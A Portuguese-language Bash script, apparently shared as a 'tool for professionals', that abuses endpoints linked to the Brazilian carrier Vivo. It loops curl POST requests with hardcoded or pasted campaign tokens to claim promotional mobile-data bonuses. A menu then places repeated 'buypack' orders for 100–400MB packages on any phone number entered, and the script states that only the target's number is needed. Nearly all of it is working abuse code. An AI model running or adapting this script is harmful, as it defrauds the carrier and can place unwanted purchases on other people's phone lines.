#!/bin/bash
clear
echo -e "   ⣀⣀⣤⣤⣴⣶⣶⣶⣶⣶⣶⣶⣶⣶⣶⣶⣶⣶⣦⣤⣤⣄⣀⡀
 ⣴⣿⣿⡿⣿⢿⣟⣿⣻⣟⡿⣟⣿⣟⡿⣟⣿⣻⣟⣿⣻⢿⣻⡿⣿⢿⣷⣆
⢘⣿⢯⣷⡿⡿⡿⢿⢿⣷⣯⡿⣽⣞⣷⣻⢯⣷⣻⣾⡿⡿⢿⢿⢿⢯⣟⣞⡮
⢸⢞⠟⠃⣉⢉⠉⠉⠓⠫⢿⣿⣷⢷⣻⣞⣿⣾⡟⠽⠚⠊⠉⠉⠉⠙⠻⣞⢵
⢜⢯⣺⢿⣻⣿⣿⣷⣔⡄⠄⠈⠛⣿⣿⡾⠋⠁⠄⠄⣄⣶⣾⣿⡿⣿⡳⡌⡗
⢽⢱⢳⢹⡪⡞⠮⠯⢯⡻⡬⡐⢨⢿⣿⣿⢀⠐⡥⣻⡻⠯⡳⢳⢹⢜⢜⢜⢎
⣻⢌⠘⠌⡂⠈⠁⠉⠁⠘⠑⢧⣕⣿⣿⣿⢤⡪⠚⠂⠈⠁⠁⠁⠂⡑⠡⡈⢮
⣳⣿⣿⣽⣭⣶⣶⣶⣶⣶⣺⣟⣾⣻⣿⣯⢯⢿⣳⣶⣶⣶⣖⣶⣮⣭⣷⣽⣗
⢻⡿⡿⣟⣿⣻⣽⣟⣿⢯⣟⣞⡷⣿⣿⣯⢿⢽⢯⣿⣻⣟⣿⣻⣟⣿⣻⢿⣿
⡑⡏⠯⡯⡳⡯⣗⢯⢟⡽⣗⣯⣟⣿⣿⣾⣫⢿⣽⠾⡽⣺⢳⡫⡞⡗⡝⢕⠕
⢂⡎⠅⡃⢇⠇⠇⣃⣧⡺⡻⡳⡫⣿⡿⣟⠞⠽⠯⢧⣅⣃⠣⠱⡑⡑⠨⢐⢌
⠐⠼⣦⢀⠄⣶⣿⢿⣿⣧⣄⡌⠂⠢⠩⠂⠑⣁⣅⣾⢿⣟⣷⠦⠄⠄⡤⡇⡪
 ⠨⢻⣧⡅⡈⠛⠿⠿⠿⠛⠁⠄⢀⡀⠄⠄⠘⠻⠿⠿⠯⠓⠁⢠⣱⡿⢑⠄
 ⠈⢌⢿⣷⡐⠤⣀⣀⣂⣀⢀⢀⡓⠝⡂⡀⢀⢀⢀⣀⣀⠤⢊⣼⡟⡡⡁
  ⠈⢢⠚⣿⣄⠈⠉⠛⠛⠟⠿⠿⠟⠿⠻⠻⠛⠛⠉⠄⣠⠾⢑⠰⠈
    ⠑⢌⠿⣦⡡⣱⣸⣸⣆⠄⠄⠄⣰⣕⢔⢔⠡⣼⠞⡡⠁
      ⠑⢝⢷⣕⡷⣿⡿⠄⠄⠠⣿⣯⣯⡳⡽⡋⠌
        ⠙⢮⣿⣽⣯⠄⠄⢨⣿⣿⡷⡫⠃
          ⠘⠙⠝⠂⠄⢘⠋⠃ "
sleep 1
echo ""
echo -e "    \033[0m\033[01;37m• \033[01;33mTESTADOR MULTITOKENS \033[0m\033[01;37m•\033[0m"
echo -e "\033[01;37mTRUE = \033[01;32mAPROVADO \033[01;37m| FALSE = \033[01;31mREPROVADO"
sleep 1
echo -e "\033[01;32mINFORME SEU NÚMERO DDD+NÚMERO\033[01;37m"
read NUMERO
echo -e "\033[01;32mQUANTAS VEZES DESEJA REPETIR?\033[1;37m"
read VEZES
echo ""
echo -e "\033[0m\033[01;33mINICIANDO TOKEN 1\033[03;037m"
for i in $(seq $VEZES);
do
data=$"msisdn=$NUMERO&campid=949e575a-6db8-4608-8b71-1281e6e506df&opCode=VV" && site="http://interatividade.vivo.ddivulga.com/carrotProcess" && curl "${site}" -d "${data}"
echo -e "\033[0m\033[01;32mCONTAGEM:\033[01;37m$i\033[03;037m"
done
echo -e ""
echo -e "\033[0m\033[01;33mINICIANDO TOKEN 2\033[03;037m"
for i in $(seq $VEZES);
do
data=$"msisdn=$NUMERO&campid=04e564c7-f410-49f5-8dee-b268eaef5223&opCode=VV" && site="http://interatividade.vivo.ddivulga.com/carrotProcess" && curl "${site}" -d "${data}"
echo -e "\033[0m\033[01;32mCONTAGEM:\033[01;37m$i\033[03;037m"
done
echo ""
echo -e "\033[0m\033[01;33mINICIANDO TOKEN 3\033[03;037m"
for i in $(seq $VEZES);
do
data=$"msisdn=$NUMERO&campid=09d15706-7d7a-4127-8f7d-d1c391d016e7&opCode=VV" && site="http://interatividade.vivo.ddivulga.com/carrotProcess" && curl "${site}" -d "${data}"
echo -e "\033[0m\033[01;32mCONTAGEM:\033[01;37m$i\033[03;037m"
done
echo ""
echo -e "\033[0m\033[01;33mINICIANDO TOKEN 4\033[03;037m"
for i in $(seq $VEZES);
do
data=$"msisdn=$NUMERO&campid=4919b47c-f588-4e71-87e3-639b3af92e4d&opCode=VV" && site="http://interatividade.vivo.ddivulga.com/carrotProcess" && curl "${site}" -d "${data}"
echo -e "\033[0m\033[01;32mCONTAGEM:\033[01;37m$i\033[03;037m"
done
echo ""
echo -e "\033[0m\033[01;33mINICIANDO TOKEN 5\033[03;037m"
for i in $(seq $VEZES);
do
data=$"msisdn=$NUMERO&campid=02f76cd1-eead-44ff-88dd-aa69538c7aef&opCode=VV" && site="http://interatividade.vivo.ddivulga.com/carrotProcess" && curl "${site}" -d "${data}"
echo -e "\033[0m\033[01;32mCONTAGEM:\033[01;37m$i\033[03;037m"
done
echo ""
echo -e "        \033[0m\033[01;37m• \033[01;32mPROGRAMA FINALIZADO \033[01;37m•\033[0m"
sleep 5


echo -e "um pouco mais"


sleep 1
echo ""
echo -e "    \033[0m\033[01;37m• \033[01;33mTestador de Token MB Vivo \033[0m\033[01;37m•\033[0m"
echo -e "\033[01;37mTrue = \033[01;32m Aprovado \033[01;37m| False = \033[01;31m  Agora não"
sleep 1
echo -e "\033[01;32m Cola seu Token\033[01;37m"
read TOKEN
echo -e "\033[01;32m Cola seu DDD+NÚMERO\033[01;37m"
read NUMERO
echo -e "\033[01;32m Repetir quantas vezes?\033[1;37m"
read VEZES
echo -e "\033[01;32m É hora do show\033[1;37m"
sleep 1
echo ""
echo -e "\033[0m\033[01;33m vai brasiliam\033[03;037m"
for i in $(seq $VEZES);
do
data=$"msisdn=$NUMERO&campid=$TOKEN&opCode=VV" && site="http://interatividade.vivo.ddivulga.com/carrotProcess" && curl "${site}" -d "${data}"
echo -e "\033[0m\033[01;32m mais:\033[01;37m$i\033[03;037m"
done
echo ""
echo -e "        \033[0m\033[01;37m• \033[01;32mFim de transmissão \033[01;37m•\033[0m"
sleep 1

echo -e "Espere, não vá embora"
sleep 1

echo ""
sleep 2
echo -e "\e[00;33;01mESTA É UMA FERRAMENTA APENAS PARA PROFISSIONAIS, LEIA \nDESCRIÇÃO ANTES DE BAIXAR\033[0m"
sleep 3
echo -e "\e[00;33;01mSE VOCÊ NÃO SE ACHA CAPAZ DE USAR, DÊ O FORA DAQUI\033[0m"
sleep 2
echo -e "\e[00;33;01mTODA AÇÃO REALIZADA POR VOCÊ, É DE SUA RESPONSABILIDADE\033[0m"
sleep 3
echo -e '\e[00;00;02molá mãe EHISOPENER\e[m'
sleep 1
clear
echo -e "\e[00;33;01mVOCÊ PODERÁ FAZER SOLICITAÇÕES\nDE PACOTES DE MB DIRETAMENTE PARA UM CHIP VIVO\nCOMO SE ESTIVESSE FAZENDO PELO SITE OU APP\nPORÉM PODE FAZER ISSO APENAS TENDO O NÚMERO DA PESSOA\n\n\e[01;32mOPÇÕES COMO: 100MB | 200MB | 400MB\e[m"
sleep 3
echo ""
echo -e "\033[01;37mSELECIONE UMA OPÇÃO:\033[0m"
echo -e "\033[0m\033[01;37m(1) \033[01;32m100MB\033[0m"
echo -e "\033[0m\033[01;37m(2) \033[01;32m200MB\033[0m"
echo -e "\033[0m\033[01;37m(3) \033[01;32m400MB\033[0m"
echo -e "\033[0m\033[01;37m(4) \033[01;32mSAIR, TENHO MEDO DE USAR\033[0m"
read OPTION
case $OPTION in 
        (1) echo -e "\e[00;37;01mDIGITE O NÚMERO DDD+NÚMERO\e[m"
         read NUMERO
         echo -e "\e[00;37;01mREPETIR QUANTAS VEZES? CUIDADO\e[m"
         read VEZES
         echo -e "\033[01;37msend:false,return:true = \033[01;32mSUCESSO NA SOLICITAÇÃO\e[0m"
         for i in $(seq $VEZES);
         do
         echo ""
         echo -e "\e[00;37;01mRESULTADO:...\e[0m"
         data=$"pack=100c&act=buypack&impressionUUID=&ispClickId=&logPack=100mb&telefone=$NUMERO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl "${site}" -d "${data}"
         done
         echo ""
         echo -e "\033[01;32mSOLICITAÇÕES FINALIZADAS\e[0m"
         sleep 5
         ;;
        (2) echo -e "\e[00;37;01mDIGITE O NÚMERO DDD+NÚMERO\e[m"
         read NUMERO
         echo -e "\e[00;37;01mREPETIR QUANTAS VEZES? CUIDADO\e[m"
         read VEZES
         echo -e "\033[01;37msend:false,return:true = \033[01;32mSUCESSO NA SOLICITAÇÃO\e[0m"
         for i in $(seq $VEZES);
         do
         echo ""
         echo -e "\e[00;37;01mRESULTADO:...\e[0m"
           data=$"pack=200CPRE&act=buypack&impressionUUID=&ispClickId=&logPack=200cpre&telefone=$NUMERO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl "${site}" -d "${data}"
        done
         echo ""
         echo -e "\033[01;32mSOLICITAÇÕES FINALIZADAS\e[0m"
         sleep 5
         ;;
        (3) echo -e "\e[00;37;01mDIGITE O NÚMERO DDD+NÚMERO\e[m"
         read NUMERO
         echo -e "\e[00;37;01mREPETIR QUANTAS VEZES? CUIDADO\e[m"
         read VEZES
         echo -e "\033[01;37msend:false,return:true = \033[01;32mSUCESSO NA SOLICITAÇÃO\e[0m"
         for i in $(seq $VEZES);
         do
         echo ""
         echo -e "\e[00;37;01mRESULTADO:...\e[0m"
           data=$"pack=400c&act=buypack&impressionUUID=&ispClickId=&logPack=400mb_bn&telefone=$NUMERO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl "${site}" -d "${data}"
        done
         echo ""
         echo -e "\033[01;32mSOLICITAÇÕES FINALIZADAS\e[0m"
         sleep 5
         ;;
        (4) echo -e "\e[00;33;01mSEM ARREPENDIMENTOS\e[0m"
           sleep 1
           exit
        ;;
        (*) echo -e "\033[1;31mOPCÃO INVÁLIDA!\033[1;37m"
esac
rm ospacotesmb > /dev/null 2&1
./ospacotesmb.sh
